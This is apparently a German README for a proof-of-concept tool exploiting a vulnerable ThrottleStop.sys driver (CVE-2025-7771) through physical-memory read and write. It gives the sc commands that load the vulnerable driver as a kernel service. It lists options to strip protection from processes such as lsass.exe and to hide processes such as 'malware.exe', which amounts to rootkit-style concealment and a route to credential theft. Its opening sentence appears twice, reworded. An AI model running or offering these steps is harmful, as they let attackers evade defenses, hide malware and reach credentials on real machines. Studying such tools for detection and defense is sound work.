
Ein einfacher PoC, der die Schwachstelle im ThrottleStop.sys-Treiber demonstriert und willkürliche Lese- und Schreiboperationen im physischen Speicher sowie die Übersetzung virtueller in physische Adressen mittels Superfetch zeigt.
Ein einfacher PoC, der die Schwachstelle im Treiber ThrottleStop.sys demonstriert und beliebige Lese- und Schreibzugriffe auf den physischen Arbeitsspeicher sowie die virtuelle-zu-physische Adressübersetzung mittels Superfetch aufzeigt.
Starten Sie cmd.exe mit Administratorrechten und registrieren Sie einen Kernel-Treiber-Dienst mit dem Typ "kernel" und binPath, der auf den Speicherort des anfälligen Treibers verweist.
> sc create ThrottleStop binPath= <pfad> type= kernel`
> sc start ThrottleStop
Befehle:
--protect : Schützt einen Prozess.
--unprotect : Entschützt einen geschützten Prozess.
--hide : Verbirgt einen Prozess.
--unhide : Macht einen verborgenen Prozess wieder sichtbar.
--help : Hilfe anzeigen
Beispiele:
CVE-2025-7771.exe --protect notepad.exe oder CVE-2025-7771.exe --protect 12345
CVE-2025-7771.exe --unprotect lsass.exe oder CVE-2025-7771.exe --unprotect 12345
CVE-2025-7771.exe --hide malware.exe oder CVE-2025-7771.exe --hide 12345
Um einen verborgenen Prozess wieder sichtbar zu machen, können Sie den Befehl --unhide zusammen mit der Angabe der eprocess-Adresse des verborgenen Prozesses mit '--eprocess' verwenden:
CVE-2025-7771.exe --unhide --eprocess 0xffffc207da1d9240
Sie sind dafür verantwortlich, sicherzustellen, dass Sie vor der Verwendung dieses Tools über die entsprechende Berechtigung verfügen. Der Autor übernimmt keine Haftung für Missbrauch.
Dies ist ein laufendes Projekt, Beiträge und Vorschläge sind willkommen! Wenn Sie Ideen, Verbesserungen haben oder mitarbeiten möchten, kontaktieren Sie uns gerne unter: [email protected]